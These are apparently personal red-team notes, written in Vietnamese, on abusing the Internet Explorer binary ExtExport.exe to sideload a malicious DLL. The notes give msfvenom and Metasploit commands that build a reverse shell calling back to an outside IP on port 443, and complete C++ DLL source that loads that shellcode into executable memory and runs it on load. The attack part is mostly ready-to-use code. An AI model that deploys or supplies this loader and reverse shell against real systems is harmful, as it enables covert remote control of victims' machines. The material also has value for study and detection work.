https://kienmanowar.wordpress.com/2019/02/21/reversing-with-ida-from-scratch-p1/#more-3437 [ToC] --- ## Các ứng dụng https://www.dji.com/global/downloads/softwares/assistant-dji-2 https://edu.casio.com/softwarelicense/index.php#col2 --- ## ExtExport.exe - Khái quát: đây là tệp thực thi của Internet Explorer, nằm trong path *C:\Program Files\Internet Explorer\Extexport.exe* - Ý tưởng: Để ExtExport.exe load và thực thi DLL thì DLL phải có tên mozcrt19.dll, mozsqlite3.dll, sqlite.dll - Thực hiện: ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.123.123.129 LPORT=443 -f raw -o shellcode msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_http; set LHOST 10.123.123.129; set LPORT 443; exploit" ``` ``` #include "pch.h" #include <windows.h> #include "resource.h" DWORD WINAPI RunShellCode(LPVOID lpParam) { HMODULE hModule = (HMODULE)lpParam; HRSRC hRes = FindResource(hModule, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); HGLOBAL hGlobal = LoadResource(hModule, hRes); LPVOID pShellCode = LockResource(hGlobal); DWORD dwSize = SizeofResource(hModule, hRes); LPVOID exec = VirtualAlloc(NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!exec) return 1; memcpy(exec, pShellCode, dwSize); ((void(*)())exec)(); return 0; } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { RunShellCode(hModule); break; } case DLL_PROCESS_DETACH: break; } return TRUE; } ``` - Tham khảo: + Extexport: https://app.tidalcyber.com/software/2e6f1aed-a983-44fb-aed1-b4a3d9cb9488 + ExtExport – yet another LOLBin: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ ### Deadlock DLL main